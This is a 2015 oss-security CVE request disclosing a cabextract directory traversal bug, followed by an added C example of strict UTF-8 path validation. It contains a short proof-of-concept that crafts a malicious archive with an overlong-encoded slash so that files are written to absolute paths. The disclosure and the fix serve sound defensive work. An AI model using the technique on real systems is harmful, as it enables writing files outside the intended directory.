Date: Wed, 18 Feb 2015 13:11:55 +0300
From: Alexander Cherepanov <ch3root@...nwall.com>
To: oss-security@...ts.openwall.com
Subject: CVE Request: cabextract -- directory traversal

Hi!

cabextract is susceptible to a directory traversal vulnerability. While 
extracting files from an archive, it removes leading slashes from 
filenames but does it before possibly decoding UTF-8 and doesn't check 
for invalid UTF-8. Hence an absolute filename can be shoved through by 
using overlong encoding for the leading slash (and setting utf8 
attribute in the header). This can be exploited by a malicious archive 
to write files outside the current directory.

Illustration:

$ touch xxxxxxxxxx
$ lcab xxxxxxxxxx test.cab
$ sed -i 's|\x20\x00xxxxxxxxxx|\xa0\x00\xe0\x80\xaftmp/abs|g' test.cab
$ rm xxxxxxxxxx

$ ls /tmp/abs
ls: cannot access /tmp/abs: No such file or directory

$ ./cabextract test.cab
Extracting cabinet: test.cab
   extracting /tmp/abs

All done, no errors.

$ ls /tmp/abs
/tmp/abs

In the sed command above, \xe0\x80\xaf is an overlong encoding for '/', 
and \xa0\x00 are the flags, updated to include the UTF-8 flag.

The issue was found in cabextract 1.4, where a 2-byte encoding (\xc0\xaf) was 
enough to hide '/'. cabextract 1.5 tightened its UTF-8 checks, and a 3-byte 
encoding is now necessary.

The issue was reported to Stuart Caie today and fixed in less than 4h:

http://sourceforge.net/p/libmspack/code/217/

Another release of cabextract is expected in the next few days.

Could a CVE please be assigned?

-- 
Alexander Cherepanov
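
A defensive check for the class of bug described in this post, as an added example (not cabextract's or libmspack's code): the cabinet entry name is run through a strict UTF-8 decoder that rejects overlong forms such as \xc0\xaf and \xe0\x80\xaf, and the leading-separator test is applied to the decoded code points rather than the raw bytes, so the strip-before-decode ordering the post describes cannot be evaded. It goes slightly beyond the post by also rejecting ".." components; the function names and the utf8_attr parameter are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
/* Added example, hypothetical API (not libmspack's code). Strictly decode one UTF-8
 * sequence from s (n bytes available): shortest form only, no surrogates, nothing
 * above U+10FFFF. Returns bytes consumed, or 0 if the input is not valid UTF-8. */
size_t utf8_decode_strict(const unsigned char *s, size_t n, uint32_t *cp)
{
    size_t len, i;
    uint32_t v, min;
    if (n == 0) return 0;
    if (s[0] < 0x80) { *cp = s[0]; return 1; }
    if ((s[0] & 0xE0) == 0xC0)      { len = 2; v = s[0] & 0x1F; min = 0x80; }
    else if ((s[0] & 0xF0) == 0xE0) { len = 3; v = s[0] & 0x0F; min = 0x800; }
    else if ((s[0] & 0xF8) == 0xF0) { len = 4; v = s[0] & 0x07; min = 0x10000; }
    else return 0;                       /* stray continuation byte or 0xF8..0xFF */
    if (n < len) return 0;               /* truncated sequence */
    for (i = 1; i < len; i++) {
        if ((s[i] & 0xC0) != 0x80) return 0;
        v = (v << 6) | (s[i] & 0x3F);
    }
    if (v < min) return 0;               /* overlong: C0 AF and E0 80 AF both fail here */
    if (v > 0x10FFFF || (v >= 0xD800 && v <= 0xDFFF)) return 0;
    *cp = v;
    return len;
}

/* Decide whether a cabinet entry name may be written under the output directory.
 * The name is decoded first (strictly, when the CAB UTF-8 attribute is set) and
 * only then inspected, so a separator hidden in a non-shortest encoding is
 * rejected as invalid instead of slipping past a byte-level strip. 1 = safe. */
int cab_name_is_safe(const unsigned char *name, size_t n, int utf8_attr)
{
    size_t i = 0, step, comp_len = 0, dots = 0;
    uint32_t cp;
    if (n == 0) return 0;
    while (i < n) {
        if (!utf8_attr) { cp = name[i]; step = 1; }          /* legacy: one byte per char */
        else if (!(step = utf8_decode_strict(name + i, n - i, &cp))) return 0;
        if (cp == '/' || cp == '\\') {
            if (i == 0) return 0;                            /* leading separator: absolute */
            if (comp_len == 2 && dots == 2) return 0;        /* ".." component */
            comp_len = dots = 0;
        } else {
            comp_len++;
            if (cp == '.') dots++;
        }
        i += step;
    }
    return !(comp_len == 2 && dots == 2);                    /* trailing ".." */
}
```

The constructed name "\xe0\x80\xaftmp/abs" from the post's sed command is rejected as invalid UTF-8 before any path logic runs, while ordinary names such as "dir/file.txt" pass.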
